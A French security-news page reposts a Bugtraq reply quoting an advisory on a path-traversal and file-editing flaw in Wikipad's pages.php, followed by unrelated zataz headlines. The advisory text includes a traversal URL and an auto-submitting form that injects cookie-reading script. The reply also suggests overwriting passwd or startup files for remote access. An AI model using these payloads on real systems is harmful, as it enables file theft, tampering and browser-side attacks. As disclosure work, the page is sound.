Publié le 29-04-2011 17:04 sur la mailing-list Bugtraq

Pub : Logiciels de sécurité et de protection Internet

: Vulnerability ID: HTB22827
: Reference: http://www.htbridge.ch/advisory/file_content_disclosure_in_wikipad.html

: Vulnerability Type: File Content Disclosure
: Risk level: Low

: Vulnerability Details:
: The vulnerability exists due to failure in the "/pages.php" script to properly sanitize user-supplied input in "id" variable. We can disclose content of ".txt" files on file system.
:
: The following PoC is available:
: http://host/pages.php?id=./../../../../../txt_file

So you can dump the contents of an arbitrary file, presumably outside the
web root, and this is 'Low' severity? Ok, perhaps authentication is
required or something else makes it a bit tricky..

: Also, we can change content of this file by using PoC:
:
: <form action="http://host/pages.php?action=edit&id=./../../../../../txt_file&title=test" method="post" name="main">
: <input type="hidden" name="data[text]" value='new content"><script>alert(document.cookie)</script>'>
: </form>
:
: <script>
: document.main.submit();
: </script>

Now you can *edit* any file on the system, and this is 'Low' severity?
Worse, you throw in some script code instead of editing something a bit
more serious like editing a system startup file, passwd or some other form
of remote access?

At the very least, this would be 'Medium' by most standards.

Votre compte Facebook a-t-il été infiltré ?

24-05-2012 à 12:09 - 0 commentaire(s)

Info zataz - Une vague de faux messages vise des milliers de comptes Français Facebook. Prudence aux photos sexy diffusées.

Fuite de données pour iPhone

22-05-2012 à 00:43 - 0 commentaire(s)

Info zataz - Un iPhone jailbreaké couplé avec Tweak Bulletin permet de passer outre le mot de passe d´ouverture du téléphone.

Téléphone portable ZTE piégé

22-05-2012 à 00:38 - 0 commentaire(s)

Le fabricant chinois de téléphone portable ZTE a confirmé la présence d'une porte dérobée dans l'un de ses smartphones sous Android.

Le Bureau de Justice US piraté

22-05-2012 à 00:31 - 0 commentaire(s)

Info zataz - Des milliers de données sensibles volées par des Anonymous au Bureau of Justice US.

Anonymous contre pédophiles

22-05-2012 à 00:09 - 0 commentaire(s)

Info ZATAZ : Plusieurs dizaines d´informations concernant des pédophiles présumés venant du réseau Darknet diffusées par des Anonymous.

Vulnérabilité sur les site de FHM, ELLE et Forbes

20-05-2012 à 20:38 - 0 commentaire(s)

Info zataz - Des failles découvertes sur les sites des magazines FHM, ELLE et Forbes peuvent mettre en danger les lecteurs internautes.

Anonymous menacent le gouvernement québécois

20-05-2012 à 20:28 - 0 commentaire(s)

Info @zataz - Le gouvernement Québécois veut faire interdire des manifestations étudiantes. Les Anonymous répondent en lançant des attaques informatiques.

Class action de 15 milliards contre Facebook

20-05-2012 à 20:23 - 0 commentaire(s)

Facebook rentre en bourse, des internautes lancent une Class Action de 15 milliards de dollars contre Facebook.